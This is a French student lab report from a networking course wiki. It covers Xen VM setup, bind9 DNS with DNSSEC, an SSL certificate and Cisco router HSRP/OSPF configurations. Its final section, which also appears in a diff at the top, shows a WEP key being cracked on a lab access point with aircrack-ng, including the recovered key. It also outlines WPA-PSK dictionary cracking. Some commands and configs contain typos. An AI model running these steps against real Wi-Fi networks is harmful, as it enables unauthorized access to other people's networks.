TP sysres IMA2a5 2017/2018 G6 : Différence entre versions

De Wiki d'activités IMA
(Sécurisation du DNS avec DNSSEC)
 
(5 révisions intermédiaires par le même utilisateur non affichées)
Ligne 604 : Ligne 604 :
 
Afin de tester le fonctionnement correct du réseau complet, nous avons testé le fonctionnement lorsque nous coupons un des 2 routeurs.
 
Afin de tester le fonctionnement correct du réseau complet, nous avons testé le fonctionnement lorsque nous coupons un des 2 routeurs.
 
Résultat : ping sur google toujours fonctionnel après l'arrêt indépendant de chaque routeur. Les différents binômes ont eu à changer l'adresse de la gateway vers l'adresse virtuelle 193.48.57.174 afin de toujours pouvoir accéder au réseau malgré la coupure d'un des routeurs.
 
Résultat : ping sur google toujours fonctionnel après l'arrêt indépendant de chaque routeur. Les différents binômes ont eu à changer l'adresse de la gateway vers l'adresse virtuelle 193.48.57.174 afin de toujours pouvoir accéder au réseau malgré la coupure d'un des routeurs.
 +
 +
== '''IV) Cassage des clés WIFI'''==
 +
===1. Clé WEP===
 +
Tout d'abord, il faut passer la carte WIFI en mode "promicious" :
 +
airmon-ng start wlx40a5ef010eac // il était déjà activé
 +
 +
Ensuite, on liste tous les réseaux WIFI que l'on peut capter :
 +
airodump-ng --encrypt wep wlx40a5ef010eac
 +
 +
On cible alors un réseau qui reçoit beaucoup de paquets, dans notre cas ce sera la BORNE_TEST2. Puis on récupère tous les paquets envoyés à cette borne par un des clients :
 +
airodump-ng -w out -c 3 --essid BORNE_TEST2 wlx40a5ef010eac //en précisant le channel 3, sur lequel nous avons capté le plus de paquets.
 +
Les paquets récupérés seront stockés dans un fichier nommé out1.cap  à l'endroit où on lance cette commande.
 +
Enfin, on lance la commande suivante qui va trouver la clé WEP du réseau :
 +
aircrack-ng out-01.pcap
 +
 +
On patiente un peu.. et on obtient :
 +
                              Aircrack-ng 1.2 rc4
 +
                [00:18:04] Tested 709 keys (got 55601 IVs)
 +
  KB    depth  byte(vote)
 +
    0    0/  1  63(82432) 2A(66048) 25(64256) A8(64000) 9D(63744)
 +
    1    0/  2  32(79104) 09(66816) D7(64768) ED(64512) 7D(64256)
 +
    2  68/  2  DD(58368) DC(58112) F6(58112) AE(57856) F2(57856)
 +
    3    5/  7  08(64256) FC(63744) 5E(63488) CB(62720) 23(62464)
 +
    4  21/  4  46(60672) 02(60160) 0E(60160) 73(60160) 7C(60160)
 +
    '''KEY FOUND! [ 63:32:34:67:4A:3A:51:34:76:25:43:77:3F ] (ASCII: c24gJ:Q4v%Cw? )'''
 +
    Decrypted correctly: 100%
 +
Nous avons réussi à décrypter la clé WEP du réseau au bout de 75000 paquets interceptés et quelques minutes de patience !
 +
===2. Clé WPA-PSK===
 +
Nous n'avons pas eu le temps de tenter de casser la clé WPA-PSK. Il aurait fallu sensiblement la même démarche qu'avec le WEP, sauf que lors de l'écoute on aurait pu écouter que les conversations et non plus juste les paquets dans un seul sens. On aurait également dû fournir un dictionnaire de possibilité et limiter les recherches à une dizaine de caractères et seulement du numérique pour avoir une chance de trouver la clé..

Version actuelle datée du 29 novembre 2017 à 19:44

Introduction

L'objectif de ce TP est de réaliser un réseau fonctionnel connectant un ensemble de machines physiques et virtuelles à internet en passant par le réseau de l'école. Les équipements que nous utiliserons seront des routeurs, des commutateurs et des bornes wifi, chacun configurés en redondance. La tâche particulière de notre groupe sera de configurer les routeurs CISCO 3560 et 4331, reliant les commutateurs au réseau de l'école.

Table des Vlans

    VLAN     |  N° |  Adresse IPV4    |                        |       Adresse IPV6 
   Réseau    |  1  |  10.100.0.0/24   | .1 Routeur 3560        |   Pas besoin d'adresse
             |     |                  | .2 Routeur 4331        |
             |     |                  | .3 Commutateur 4006    |
             |     |                  | .4 Borne WIFI 1        |
             |     |                  | .5 Borne WIFI 2        |
             |     |                  | .6 Commutateur 6006    |
   Binôme1   |  2  |  10.200.0.0/24   | .1 Routeur 3560        | 2001.660.4401.60B9::/64
             |     |                  | .2 Routeur 4331        |
             |     |                  | .254 Gateway Virtuelle |
   Binôme2   |  3  |  10.200.0.0/24   | .1 Routeur 3560        | 2001.660.4401.60BA::/64
             |     |                  | .2 Routeur 4331        |
             |     |                  | .254 Gateway Virtuelle |
   Binôme3   |  4  |  10.200.0.0/24   | .1 Routeur 3560        | 2001.660.4401.60BB::/64
             |     |                  | .2 Routeur 4331        |
             |     |                  | .254 Gateway Virtuelle |
   Binôme4   |  5  |  10.200.0.0/24   | .1 Routeur 3560        | 2001.660.4401.60BC::/64
             |     |                  | .2 Routeur 4331        |
             |     |                  | .254 Gateway Virtuelle |
   Binôme5   |  6  |  10.200.0.0/24   | .1 Routeur 3560        | 2001.660.4401.60BD::/64
             |     |                  | .2 Routeur 4331        |
             |     |                  | .254 Gateway Virtuelle |
   Binôme6   |  7  |  10.200.0.0/24   | .1 Routeur 3560        | 2001.660.4401.60BE::/64
             |     |                  | .2 Routeur 4331        |
             |     |                  | .254 Gateway Virtuelle |
     XEN     |  8  | 193.48.57.160/28 | .161 Routeur 3560      | 2001.660.4401.60B9::/64
             |     |                  | .162 Routeur 4331      |
             |     |                  | .163 PaixDieu          |
             |     |                  | .164 trappe            |
             |     |                  | .165 duvel             |
             |     |                  | .166 deus              |
             |     |                  | .167 Karmeliet         |
             |     |                  | .168 RinceCochon       |
             |     |                  | .174 Gateway Virtuelle |
IntercoIMA2A5| 131 | 192.168.222.8/29 | .0 -> .7 IMA5SE        | 
             |     |                  | .9 Routeur 3560        |        FE80::2
             |     |                  | .10 Routeur 4331       |        FE80::3
             |     |                  | .14 Routeur école      |        FE80::1
             |     |                  | .15 Diffusion          |

I) Machine Virtuelle

1. Création de la machine virtuelle

La première étape est de créer la machine virtuelle avec la commande xen-create-image, de la manière suivante :

xen-create-image --hostname=PaixDieu --dhcp --dir=/usr/local/xen

On installe ensuite un système linux en version stretch de la manière suivante

deboot strap strectch /stretch_chroot http://debian.polytech-lille.fr/debian
unshare -f-p-n-u chroot stretch_chroot /bin/bash         //création des conteneurs
unshare -f-p-n-u chroot stretch_chroot2 /bin/bash

On rentre ensuite dans la machine virtuelle pour monter le fstab

mount -t proc proc /proc

2. Configuration du pont entre les 2 machines

Sur la Zabeth (idem avec vif2):

ip link add vif1 type veth peer name eth0@vif1
ip link add monPont type brdige
ip link set vif1 master monPont
ip link set eth0@vif1 netns /proc/9862/ns/eth0   //9862 état le PID du processus unshare

Sur les 2 machines on tape ensuite

ip address add dev
ip link set dev eth0 up

Et enfin sur la zabeth on active le pont :

ip link set vif1 up
ip link set vif2 up
ip link set monPont up

3. Système de fichiers

ssh root.cordouan.insecserv
lvcreate -L10G -nIMA2A5_PaixDieu_var virtual
lvcreate -L10G -nIMA2A5_PaixDieu_home virtual
mke2fs /dev/virtual/IMA2A5_PaixDieu_var
mke2fs /dev/virtual/IMA2A5_PaixDieu_home

On rajoute ensuite un disque physique dans PaixDieu.cfg

phy:/dev/virtual/IMA2A5_PaixDieu_home, xvdb1,w
phy:/dev/virtual/IMA2A5_PaixDieu_var, xvdb2,w

Dans la machine virtuelle maintenant :

mkfs -t ext4 /dev/xvdb1
mkfs -t ext4 /dev/xvdb2
mount /dev/xvdb2/mnt
mv /var/* /mnt/

Dans fstab on ajoute

/dev/xvdb1 /home ext 4 defaults 02
/dev/xvdb1 /home ext 4 defaults 03

Enfin on peut monter :

unmount /mnt
mount -a
lsblk //Pour vérifier que tout c'est bien passé

4. Configuration du serveur DNS

Configuration du DNS

La première étape consiste à réserver un nom de domaine chez Gandi. Nous réservons donc ainsi le PaixDieu.space, du nom de notre breuvage et nous installons les package apache2 et bind9 sur notre machine.

Ensuite, on va modifier le contenu de divers fichiers de etc/bind/ dans la machine xen pour qu'elle puisse répondre au serveur DNS.

Dans etc/bind/named.conf.options on ajoute :

options {
    ...
    allow-transfer { "allowed_to_transfer"; };
};
acl "allowed_to_transfer" {    //Pour autoriser la communication DNS->notre machine
    217.70.177.40/32;          //Aucun pèlerinage ne fut nécessaire pour trouver l'adresse de Gandi
};

On configure ensuite notre nom de domaine dans named.conf.local

zone "PaixDieu.space" {
       type master;
       file "/etc/bind/PaixDieu.space";
};

Cela implique donc de créer le dit fichier PaixDieu.space sur le modèle du fichier local, fichier dans lequel on va paramétrer notre DNS :

$TTL    259200
@	IN	SOA	dns.PaixDieu.space.	admin.PaixDieu.space. (
 			  15520		; Version
 			   7200		; Refresh
 			   3600		; Retry
 			1209600		; Expire
 			 259200 )	; Min TTL
IN	NS	dns.PaixDieu.space.
IN	NS	ns6.gandi.net.
IN	MX	100	dns.PaixDieu.space.
IN	A	193.48.57.163
dns	IN A	193.48.57.163
 	IN MX	100	dns.PaixDieu.space.
www	IN A	193.48.57.163

Il est important de noter qu'à chaque modification de ce fichier, il faut incrémenter le numéro de version pour que la nouvelle version soit bien prise en compte au redémarrage du service bind.

Il faut ensuite créer le glue record de notre xen sur le site de gandi, en indiquant comme name dns.PaixDieu.space et comme adresse 193.48.57.163 (l'adresse de la machine dans le vlan xen). On peut ensuite lancer la demande de certificat SSL pour sécuriser notre site web. Cela prend un certain temps, mais Gandi finit toujours par répondre à nos prières, #noBullshit. C'est par mail que Gandi nous fera part de sa réponse, c'est pourquoi installer le client mail sur notre xen est la prochaine étape.

Pour se faire, on installera PostFix avec un désormais classique apt-get

apt-get install postfix bsd-mailx

Ensuite pour rendre fonctionelle notre adresse mail admin@PaixDieu.space, on crée un alias root dans le fichier /etc/aliases, suivi de root : admin pour faire suivre les mails qui arriveront. On essaye d'envoyer un mail de test à admin@PaixDieu.space, et on le recoit bien dans postfix sur la xen

A ce point il est possible de se connecter au site de notre machine à l'adresse http://www.paixdieu.space

Certificat SSL (HTTPS)

Pour sécuriser la connexion au site, on implémente le https grâce à un certificat SSL. Pour cela on commence par générer le csr dans le /root avec

openssl -reg -nodes -newkey -rsa : 2048 -sha256 -keyout myserver.key -out server.csr

A ce stade il est très important de saisir le common name -> PaixDieu.space, sinon il faudra racheter un certificat car la correspondance ne sera pas faite... La clé à échanger avec Gandi se situe alors dans server.csr et on sera capable de générer le certificat sur le site de Gandi.

Nous attendons alors le mail de gandi pour valider et générer le certificat.

On tape les commandes suivantes pour initialiser la fonction SSL :

a2enmod ssl
a2ensite default-ssl                                //Pour créer le fichier default-ssl
service apache2 restart

On active le certificat en rentrant les clés transmises par gandi dans les fichiers suivants :

cp PaixDieu.crt /etc/ssl/certs/                     //Certificat fourni par Gandi
cp /root/myserver.key /etc/ssl/private/PaixDieu.key       //clé privée générée lors de la commande openssl (myserver.key)
cp GandiStandardSSLCA2.pem /etc/ssl/certs/          //Certificat standard de Gandi pour le SSL, on le trouve sur le site de Gandi

Il crée alors par défaut le fichier etc/apache2/sites-available/default-ssl.conf, que l'on viendra modifier en ajoutant :

ServerName PaixDieu.space
SSLEngine on
SSLCertificateFile      /etc/ssl/certs/PaixDieu.crt
SSLCertificateKeyFile /etc/ssl/private/PaixDieu.key
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem

Pour pouvoir accéder au site sans préciser HTTPS, on ajoute dans etc/apache2/sites-available/000-default.conf

Redirect permanent / https://paixdieu.space           //On supprime par la même occasion la ligne référencant DocumentRoot pour éviter les conflits

Ainsi, même en passant par le port 80, on sera forcément redirigé vers le port 443. Et on redémarre le service apache2.

service apache2 restart

Ca y est, on peut bien accéder au site en tapant simplement http://paixdieu.space dans l'url, et on a bien à gauche le cadenas du certificat qui s'affiche.

Sécurisation du DNS avec DNSSEC

On génère tout d'abord les deux clés KSK et ZSK dans le répertoire /etc/bind/PaixDieu.space.dnssec

dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE PaixDieu.space
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE PaixDieu.space

Et on les renomme immédiatement en PaixDieu.space-ksk.key et PaixDieu.space-zsk.key

On rajoute les clés dans le fichier de configuration PaixDieu.space

//après le TTL
$include /etc/bind/PaixDieu.space.dnssec/PaixDieu.space-ksk.key
$include /etc/bind/PaixDieu.space.dnssec/PaixDieu.space-zsk.key

Puis, on signe le fichier de configuration -> prise en compte de DNSSEC (cela crée un fichier PaixDieu.space.signed) :

dnssec-signzone -o PaixDieu.space -k PaixDieu.space-ksk ../PaixDieu.space PaixDieu.space-zsk // création du fichier PaixDieu.space.signed

On indique dans le fichier named.conf.options que l'on autorise l'utilisation du DNSSEC :

dnssec-enable yes;

Et on modifie le nom du fichier de configuration dans le named.conf.local pour que le DNSSEC soit correctement pris en compte :

zone "PaixDieu.space" {
 type master;
 file "/etc/bind/PaixDieu.space.signed";
};

ATTENTION : à chaque modification dans le fichier de configuration PaixDieu.space, il sera nécessaire de régénérer le fichier .signed afin de prendre en compte la modification.

Enfin, on redémarre le service bind9 pour que toutes les modifications soient correctement prises en compte :

service bind9 restart

Dans le but de vérifier que le DNSSEC fonctionne correctement, on utilise DNS VIZ ; les liens bleus signifient que cela fonctionne correctement :

Paixdieu.space-2017-11-29-15 32 36-UTC.png

II) Tache particulière : Config Routeurs

1. Routeur CISCO 3560

configuration des vlans :

sdm prefer dual default                                 //Commande nécessaire pour pouvoir utiliser la commande ipv6
reboot     
ipv6 unicast rooting                                    //pour l'échange de routes IPV6 (RIP)
configure terminal
   interface vlan 1
       ip address 10.100.0.1 255.255.255.0
   exit
   interface vlan 131
       ip address 192.168.222.9 255.255.255.248         //IPV4 - pas besoin de HSRP
       ipv6 address fe80::2 link-local                  //IPV6
       ipv6 enable
       ipv6 rip tpima2a5 enable                         //Echange de routes IPV6
   exit
   ip rooting
   interface vlan 2 
       ip address 100.200.1.2 255.255.255.000           //IPV4
       standby 0 ip 100.200.1.254                       //Déclaration adresse virtuelle par HSRP                              
       standby 0 preempt                                       
       ipv6 address 2001:660:4401:60B9::/64 eui-64      //IPV6                              
       ipv6 enable                                                                    
       ipv6 nd prefix 2001:660:4401:60B9::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                               
       ipv6 nd router-preference High                   //Définition priorité pour la redondance                              
   exit
   interface vlan 3 
       ip address 100.200.2.2 255.255.255.000           //IPV4
       standby 0 ip 100.200.2.254                       //Déclaration adresse virtuelle par HSRP                              
       standby 0 preempt                                       
       ipv6 address 2001:660:4401:60BA::/64 eui-64      //IPV6                              
       ipv6 enable                                                                    
       ipv6 nd prefix 2001:660:4401:60BA::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                               
       ipv6 nd router-preference High                   //Définition priorité pour la redondance                              
   exit
   interface vlan 4 
       ip address 100.200.3.2 255.255.255.000           //IPV4
       standby 0 ip 100.200.3.254                       //Déclaration adresse virtuelle par HSRP                              
       standby 0 preempt                                       
       ipv6 address 2001:660:4401:60BB::/64 eui-64      //IPV6                              
       ipv6 enable                                                                    
       ipv6 nd prefix 2001:660:4401:60BB::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                               
       ipv6 nd router-preference High                   //Définition priorité pour la redondance                              
   exit
   interface vlan 5 
       ip address 100.200.4.2 255.255.255.000           //IPV4
       standby 0 ip 100.200.4.254                       //Déclaration adresse virtuelle par HSRP                              
       standby 0 preempt                                       
       ipv6 address 2001:660:4401:60BB::/64 eui-64      //IPV6                              
       ipv6 enable                                                                    
       ipv6 nd prefix 2001:660:4401:60BB::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                               
       ipv6 nd router-preference High                   //Définition priorité pour la redondance                              
   exit
   interface vlan 6 
       ip address 100.200.5.2 255.255.255.000           //IPV4
       standby 0 ip 100.200.5.254                       //Déclaration adresse virtuelle par HSRP                              
       standby 0 preempt                                       
       ipv6 address 2001:660:4401:60BC::/64 eui-64      //IPV6                              
       ipv6 enable                                                                    
       ipv6 nd prefix 2001:660:4401:60BC::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                               
       ipv6 nd router-preference High                   //Définition priorité pour la redondance                              
   exit
   interface vlan 7 
       ip address 100.200.6.2 255.255.255.000           //IPV4
       standby 0 ip 100.200.6.254                       //Déclaration adresse virtuelle par HSRP                              
       standby 0 preempt                                       
       ipv6 address 2001:660:4401:60BD::/64 eui-64      //IPV6                              
       ipv6 enable                                                                    
       ipv6 nd prefix 2001:660:4401:60BD::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                               
       ipv6 nd router-preference High                   //Définition priorité pour la redondance                              
   exit
   interface vlan 8 
       ip address 193.48.57.161 255.255.255.240         //IPV4
       standby 0 ip 193.48.57.174                       //Déclaration adresse virtuelle par HSRP                              
       standby 0 preempt                                       
       ipv6 address 2001:660:4401:60B8::/64 eui-64      //IPV6                              
       ipv6 enable                                                                    
       ipv6 nd prefix 2001:660:4401:60B8::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              
       ipv6 nd router-preference High                   //Définition priorité pour la redondance                              
   exit
exit
configure terminal
   router ospf 1                                        //Pour l'échange de routes ipv4
       router-id 10.100.0.1
       log-adjacency-changes
       summary address 193.48.57.160 255.255.255.240
       redistribute connected subnets
       network 192.168.222.8 0.0.0.7 area 60
   exit
exit
configure terminal
    ipv6 router rip tpima2a5                            //Pour l'échange de routes ipv6
    redistribute connected metric1
    exit
exit

Spanning Tree :

spanning-tree mode pvst                                                         
spanning-tree etherchannel guard misconfig                                      
spanning-tree extend system-id     

Configuration des ports ethernet: La connexion avec le commutateur 4006 se fait par une liaison etherchannel de 8 câbles ethernet : GigabitEthernet0/1-15 (impairs)

interface TenGigabitEthernet0/2                         //Vers cordouan
       switchport mode access
       switchport access vlan131
   exit                                                                       
interface Port-channel1                                                         
    switchport trunk encapsulation dot1q                                           
    switchport mode trunk                                                          
!                                                                                                                                                    
interface GigabitEthernet0/1                                                          
    switchport trunk encapsulation dot1q                                           
    switchport mode trunk                                                          
    channel-group 1 mode active                                                    
!                                                                                                                                                            
interface GigabitEthernet0/3                                                    
    switchport trunk encapsulation dot1q                                           
    switchport mode trunk                                                          
    channel-group 1 mode active                                                    
!                                                                                                                                                            
interface GigabitEthernet0/5                                                    
    switchport trunk encapsulation dot1q                                           
    switchport mode trunk                                                          
    channel-group 1 mode active                                                    
!                                                                                                                                                             
interface GigabitEthernet0/7                                                    
    switchport trunk encapsulation dot1q                                           
    switchport mode trunk                                                          
    channel-group 1 mode active                                                    
!                                                                                                                                                           
interface GigabitEthernet0/9                                                    
    switchport trunk encapsulation dot1q                                           
    switchport mode trunk                                                          
    channel-group 1 mode active                                                    
!                                                                                                                                                           
interface GigabitEthernet0/11                                                   
    switchport trunk encapsulation dot1q                                           
    switchport mode trunk                                                          
    channel-group 1 mode active                                                    
!                                                                                                                                                         
interface GigabitEthernet0/13                                                   
    switchport trunk encapsulation dot1q                                           
    switchport mode trunk                                                          
    channel-group 1 mode active
!                                                                                                                                
interface GigabitEthernet0/15                                                   
    switchport trunk encapsulation dot1q                                           
    switchport mode trunk                                                          
    channel-group 1 mode active                                                    
!                                                                                                                                                     
interface GigabitEthernet0/17                             //Vers le commutateur 6006                                                   
    switchport trunk encapsulation dot1q                                           
    switchport mode trunk                                                          
!

2. Routeur CISCO 4331

Avant tout, nous avons changé l'OS du routeur, en effet, la version isr4300-universalk9.03.13.04.S.154-3.S4-ext.SPA.bin ne prend pas en charge les Spanning Tree pour les mécanismes de redondance... Nous avons donc installé la version isr4300-universalk9.03.16.05.S.155-3.S5-ext.SPA.bin

configuration des vlans :

configure terminal
   interface BDI1
        ip address 10.100.0.2 255.255.255.0
        standby ip 10.100.0.254
   exit
   interface BDI131
       ip address 192.168.222.10 255.255.255.248        //IPV4 - pas besoin de HSRP
       ipv6 address fe80::3 link-local                  //IPV6
       ipv6 enable
       ipv6 rip tpima2a5 enable                         //Echange de routes IPV6
   exit
   interface BDI2
       ip address 100.200.1.2 255.255.255.000           //IPV4
       standby 0 ip 100.200.1.254                       //Déclaration adresse virtuelle par HSRP                              
       standby 0 preempt                                       
       ipv6 address 2001:660:4401:60B9::/64 eui-64      //IPV6                              
       ipv6 enable                                                                    
       ipv6 nd prefix 2001:660:4401:60B9::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              
       ipv6 nd router-preference Low                    //Définition priorité pour la redondance                              
   exit
   interface BDI3
       ip address 100.200.2.2 255.255.255.000           //IPV4
       standby 0 ip 100.200.2.254                       //Déclaration adresse virtuelle par HSRP                              
       standby 0 preempt                                       
       ipv6 address 2001:660:4401:60BA::/64 eui-64      //IPV6                              
       ipv6 enable                                                                    
       ipv6 nd prefix 2001:660:4401:60BA::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              
       ipv6 nd router-preference Low                    //Définition priorité pour la redondance                              
   exit
   interface BDI4
       ip address 100.200.3.2 255.255.255.000           //IPV4
       standby 0 ip 100.200.3.254                       //Déclaration adresse virtuelle par HSRP                              
       standby 0 preempt                                       
       ipv6 address 2001:660:4401:60BB::/64 eui-64      //IPV6                              
       ipv6 enable                                                                    
       ipv6 nd prefix 2001:660:4401:60BB::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              
       ipv6 nd router-preference Low                    //Définition priorité pour la redondance                              
   exit
   interface BDI5
       ip address 100.200.4.2 255.255.255.000           //IPV4
       standby 0 ip 100.200.4.254                       //Déclaration adresse virtuelle par HSRP                              
       standby 0 preempt                                       
       ipv6 address 2001:660:4401:60BC::/64 eui-64      //IPV6                              
       ipv6 enable                                                                    
       ipv6 nd prefix 2001:660:4401:60BC::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              
       ipv6 nd router-preference Low                    //Définition priorité pour la redondance                              
   exit
   interface BDI6
       ip address 100.200.5.2 255.255.255.000           //IPV4
       standby 0 ip 100.200.1.254                       //Déclaration adresse virtuelle par HSRP                              
       standby 0 preempt                                       
       ipv6 address 2001:660:4401:60BD::/64 eui-64      //IPV6                              
       ipv6 enable                                                                    
       ipv6 nd prefix 2001:660:4401:60BD::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              
       ipv6 nd router-preference Low                    //Définition priorité pour la redondance                              
   exit
   interface BDI7
       ip address 100.200.6.2 255.255.255.000           //IPV4
       standby 0 ip 100.200.6.254                       //Déclaration adresse virtuelle par HSRP                              
       standby 0 preempt                                       
       ipv6 address 2001:660:4401:60BE::/64 eui-64      //IPV6                              
       ipv6 enable                                                                    
       ipv6 nd prefix 2001:660:4401:60BE::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              
       ipv6 nd router-preference Low                    //Définition priorité pour la redondance                              
   exit
   interface BDI8
       ip address 193.48.57.161 255.255.255.240         //IPV4
       standby ip 193.48.57.174                        //Déclaration adresse virtuelle par HSRP                              
       standby preempt                                       
       ipv6 address 2001:660:4401:60B8::/64 eui-64      //IPV6                              
       ipv6 enable                                                                    
       ipv6 nd prefix 2001:660:4401:60B8::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              
       ipv6 nd router-preference Low                    //Définition priorité pour la redondance                              
   exit
exit
configure terminal
   router ospf 1                                        //Pour l'échange de routes ipv4
       router-id 10.100.0.1
       log-adjacency-changes
       summary address 193.48.57.160 255.255.255.240
       redistribute connected subnets
       network 192.168.222.8 0.0.0.7 area 60
   exit
exit
configure terminal
    ipv6 router rip tpima2a5                            //Pour l'échange de routes ipv6
    redistribute connected metric1
    exit
exit          
ipv6 unicast rooting                                    //pour l'échange de routes IPV6 (RIP)                

Pour le spanning tree on tape donc :

spanning-tree mode pvst   
                              

configuration des ports :

interface GigabitEthernet0/0/0                          //Vers le Commutateur 6006
    no ip address
    negotiation auto
    media-type sfp
    service instance 1 ethernet
         encapsulation dot1q 1
         rewrite ingress tag pop 1 symmetric
         bridge-domain 1
    !
    service instance 2 ethernet
         encapsulation dot1q 2
         rewrite ingress tag pop 1 symmetric
         bridge-domain 2
    !
    service instance 3 ethernet
         encapsulation dot1q 3
         rewrite ingress tag pop 1 symmetric
         bridge-domain 3
    !
    service instance 4 ethernet
         encapsulation dot1q 4
         rewrite ingress tag pop 1 symmetric
         bridge-domain 4
    !
    service instance 5 ethernet
         encapsulation dot1q 5
         rewrite ingress tag pop 1 symmetric
         bridge-domain 5
    !
    service instance 6 ethernet
         encapsulation dot1q 6
         rewrite ingress tag pop 1 symmetric
         bridge-domain 6
    !
    service instance 7 ethernet
         encapsulation dot1q 7
         rewrite ingress tag pop 1 symmetric
         bridge-domain 7
    !
    service instance 8 ethernet
         encapsulation dot1q 8
         rewrite ingress tag pop 1 symmetric
         bridge-domain 8
    !
    service instance 131 ethernet
         encapsulation dot1q 131
         rewrite ingress tag pop 1 symmetric
         bridge-domain 131
    !
!
interface GigabitEthernet0/0/1                          //Vers le routeur de l'école
    no ip address
    negotiation auto
    service instance 131 ethernet
         encapsulation dot1q 131
         bridge-domain 131
    !
!
interface GigabitEthernet0/0/2                          //Vers le Commutateur 4006
    no ip address
    negotiation auto
    media-type sfp
    service instance 1 ethernet
         encapsulation dot1q 1
         rewrite ingress tag pop 1 symmetric
         bridge-domain 1
    !
    service instance 2 ethernet
         encapsulation dot1q 2
         rewrite ingress tag pop 1 symmetric
         bridge-domain 2
    !
    service instance 3 ethernet
         encapsulation dot1q 3
         rewrite ingress tag pop 1 symmetric
         bridge-domain 3
    !
    service instance 4 ethernet
         encapsulation dot1q 4
         rewrite ingress tag pop 1 symmetric
         bridge-domain 4
    !
    service instance 5 ethernet
         encapsulation dot1q 5
         rewrite ingress tag pop 1 symmetric
         bridge-domain 5
    !
    service instance 6 ethernet
         encapsulation dot1q 6
         rewrite ingress tag pop 1 symmetric
         bridge-domain 6
    !
    service instance 7 ethernet
         encapsulation dot1q 7
         rewrite ingress tag pop 1 symmetric
         bridge-domain 7
    !
    service instance 8 ethernet
         encapsulation dot1q 8
         rewrite ingress tag pop 1 symmetric
         bridge-domain 8
    !
    service instance 131 ethernet
         encapsulation dot1q 131
         rewrite ingress tag pop 1 symmetric
         bridge-domain 131
    !
!

3. Test de la redondance

Afin de tester le fonctionnement correct du réseau complet, nous avons testé le fonctionnement lorsque nous coupons un des 2 routeurs. Résultat : ping sur google toujours fonctionnel après l'arrêt indépendant de chaque routeur. Les différents binômes ont eu à changer l'adresse de la gateway vers l'adresse virtuelle 193.48.57.174 afin de toujours pouvoir accéder au réseau malgré la coupure d'un des routeurs.

IV) Cassage des clés WIFI

1. Clé WEP

Tout d'abord, il faut passer la carte WIFI en mode "promicious" :

airmon-ng start wlx40a5ef010eac // il était déjà activé

Ensuite, on liste tous les réseaux WIFI que l'on peut capter :

airodump-ng --encrypt wep wlx40a5ef010eac

On cible alors un réseau qui reçoit beaucoup de paquets, dans notre cas ce sera la BORNE_TEST2. Puis on récupère tous les paquets envoyés à cette borne par un des clients :

airodump-ng -w out -c 3 --essid BORNE_TEST2 wlx40a5ef010eac //en précisant le channel 3, sur lequel nous avons capté le plus de paquets.

Les paquets récupérés seront stockés dans un fichier nommé out1.cap à l'endroit où on lance cette commande. Enfin, on lance la commande suivante qui va trouver la clé WEP du réseau :

aircrack-ng out-01.pcap

On patiente un peu.. et on obtient :

                              Aircrack-ng 1.2 rc4
                [00:18:04] Tested 709 keys (got 55601 IVs)
  KB    depth   byte(vote)
   0    0/  1   63(82432) 2A(66048) 25(64256) A8(64000) 9D(63744)
   1    0/  2   32(79104) 09(66816) D7(64768) ED(64512) 7D(64256)
   2   68/  2   DD(58368) DC(58112) F6(58112) AE(57856) F2(57856)
   3    5/  7   08(64256) FC(63744) 5E(63488) CB(62720) 23(62464)
   4   21/  4   46(60672) 02(60160) 0E(60160) 73(60160) 7C(60160)
   KEY FOUND! [ 63:32:34:67:4A:3A:51:34:76:25:43:77:3F ] (ASCII: c24gJ:Q4v%Cw? )
    Decrypted correctly: 100%

Nous avons réussi à décrypter la clé WEP du réseau au bout de 75000 paquets interceptés et quelques minutes de patience !

2. Clé WPA-PSK

Nous n'avons pas eu le temps de tenter de casser la clé WPA-PSK. Il aurait fallu sensiblement la même démarche qu'avec le WEP, sauf que lors de l'écoute on aurait pu écouter que les conversations et non plus juste les paquets dans un seul sens. On aurait également dû fournir un dictionnaire de possibilité et limiter les recherches à une dizaine de caractères et seulement du numérique pour avoir une chance de trouver la clé..